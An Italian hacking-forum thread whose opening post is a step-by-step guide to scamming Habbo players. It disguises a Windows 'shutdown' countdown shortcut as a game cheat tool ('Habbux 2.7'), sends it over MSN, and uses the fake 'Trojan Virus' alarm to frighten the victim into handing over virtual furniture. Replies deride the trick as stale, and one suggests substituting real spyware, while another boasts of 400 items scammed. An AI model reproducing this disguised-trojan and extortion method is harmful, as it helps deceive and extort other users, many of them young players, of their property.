Guida [HabboHack]GuidaScammingHabbo[HabboHack]

mikihabbo

Utente Medio
Autore del topic
26 Aprile 2010
196
10
Miglior risposta
0
NE IO NE LO SCIAX2 CI ASSUMIAMO LE RESPONSABILITA DI CIO' CHE FARETE CON QUESTA GUIDA



Ho Cercato Qualcosa DI Simile Ma Non Ho Trovato Niente
Se C'era Qualcosa DI SImile Che Già Esisteva Mi Scuso Con L'Autore :emoji_slight_smile:

Praticamente SI Tratta DI Un Virus Che ''ROMPE'' Il Pc Nel Senso Che Non Lo Fa Accendere Più ''Solo Se Staccate La Batteria'' Comunque Il Virus Lo Disinnescherete Voi Dopo Aver Ricevuto I Furni


Iniziamo:- Andate sul desktop e cliccate col tasto destro -->Poi su Nuovo -->E poi su Collegamento. Perfetto ora vi apparirà sul desktop il "Nuovo Collegamento" e una schermata con uno spazio bianco dove scrivere, voi scriverete così:

shutdown -s -t 120 -c "Trojan Virus"

di questa frase potete modificare il "120" che sono i secondi del count down e la frase "Trojan Virus Activated" che leggerà il destinatario.

Ora premete avanti, vi appare la scritta "shutdown" questo è come verrà intitolato il collegamento, ma voi mettete il nome di un programma script per habbo da passare al cliente: per esempio "Habbux 2.7".

Ora cliccate su FINE e vi apparirà sul desktop il collegamento chiamato "Habbux 2.7", però c'è un problemino, il collegamento è privo di immaggine! Cliccate col destro su di lui --> poi su proprietà --> e infine su Cambia icona...

Vi appare un messaggio, date OK e scegliete tra le icone elencate nella schermata quella che vi sembra più opportuna per il file o caricatene una vostra personale.

Una volta scelta date l'OK e vi si chiuderà la schermatina, poi ridate un'altra volta OK sulla schermata delle proprietà e... VOILA! Il vostro collegamento ha ora anche un'immaggine!

Ora l'ultimo passo: create una cartella e metteteci dentro il collegamento, poi se volete fare scena createci anche un blocco notes e metteteci qualche codice per rendere la cosa più realistica.

Ora cliccate col destro sulla cartella contenete il collegamento e mettete "Aggiungi all'archivio shutdown.rar".

Così facendo potrete inviare questa cartella per MSN:

una volta inviata, se il n00b accetta gli spiegate passo passo come fare: Estrarre la cartella dal .rar, aprirla, cliccare col tasto destro del mouse sul collegamento e aprire con amministratore (altrimenti non funziona).

Quando lui farà ciò che vi ha detto si aprirà una grande schermata con scritto che il PC verrà riavviato dall'amministratore e sotto oltre al count down la frase che voi metterete, es: "Trojan Virus Activated, il virus può essere disattivato solo dal mittente".

Siccome questo count down non si può chiudere in nessun modo, (Tranne staccare la batteria al pc), è importante però che su habbo rimaniate nella stessa stanza per evitare perdite di tempo!

Spiegate al nabbo che se vi dà i furni voi disinnescherete il virus, lui in preda al panico con il 70% delle probabilità lo farà, e cosi voi avrete il tempo di mettere i furni nella stanza del vostro PG originale perchè a lui si spegnerà il PC e perderà tempo per rintracciarvi!:smile:


Spero DI Esservi Stato Utile
-mikihabbo
 
Spiegate al nabbo che se vi dà i furni voi disinnescherete il virus, lui in preda al panico con il 70% delle probabilità lo farà, e cosi voi avrete il tempo di mettere i furni nella stanza del vostro PG originale perchè a lui si spegnerà il PC e perderà tempo per rintracciarvi!:smile:
Che cavolata.
 
Troppo Tempo c'è per organizzare una cosa del genere almeno una o due settimane (conoscere la vittima e fargli capire che il virus funzioni e che può danneggiare il pc. Perchè non tutti ci crederanno.)
Eppoi adesso anche un buon Lamerone con un contatto "Msn" può fare di tutto...
Ti do un consiglio per me questo topic non è tutta fatica sprecata perchè ci avrai anche messo dell'impegno ;) Quindi se devo dare un parere è buona "PER L'IMPEGNO" Continua Così.
 
Ultima modifica:
Spero solo che questa guida sia a scopo ironico,cosa c'entra scamming scusa?
Che senso ha inviare sto bat e fare in modo che il pc si spenga in 120 secondi quando puoi sostituire il .bat con qualsiasi spyware?
Poi scusa,una volta aperto in 120 secondi non riuscirà a darti la roba quindi cosa succede,si riavvia il pc e poi che fai?

P.S di queste guide sul forum c'e ne sono 1.000.000
 
Be Ti Sbagli Perche In Quei 120 Secondi Tu Ti Prendi I Furni E Gli Disinneschi Il Pc ;) Evidentemente Non Hai Letto Tutta La Guida Carissimo ;)
--------------- AGGIUNTA AL POST ---------------
Grazie Mille Saga :emoji_slight_smile: Cmq Potresti DIre Al Noob Che E Uno Script Funzionante Della SUlake.it ''PER ESEMPIO''
 
Ultima modifica:
Scusami, apparte tutta questa fatica per scammare una persona, mi dici da dove cavolo ti è uscito il 70%? :O
 
Sapessi...:bha::bha::bha::bha:
Comunque La Vittima In Preda Al Panico Ti Da I Furni QUindi...:bye::bye::bye:
 
se ringraziate siete proprio dei nabbi!!!
Ma questa cosa dello Shutdown è una cavolata che esiste da secoli..
Ci sn 3 mila guide..
Guida inutilissima..
Lo sanno pure i bambini di 5 anni..
Post Inutile.
--------------- AGGIUNTA AL POST ---------------
poi ad alcuni come al mio compagno gli si apre con il prompt dei comandi senza avviarlo -.-
 
Ultima modifica:
Bravo per averlo postato. Comunque C'è un video su youtube...!!!Io o gia scammato 400 furni :emoji_smiley:
 
A mio parere non ci casca nessuno pero bravo una guida del genere puo sempre servire....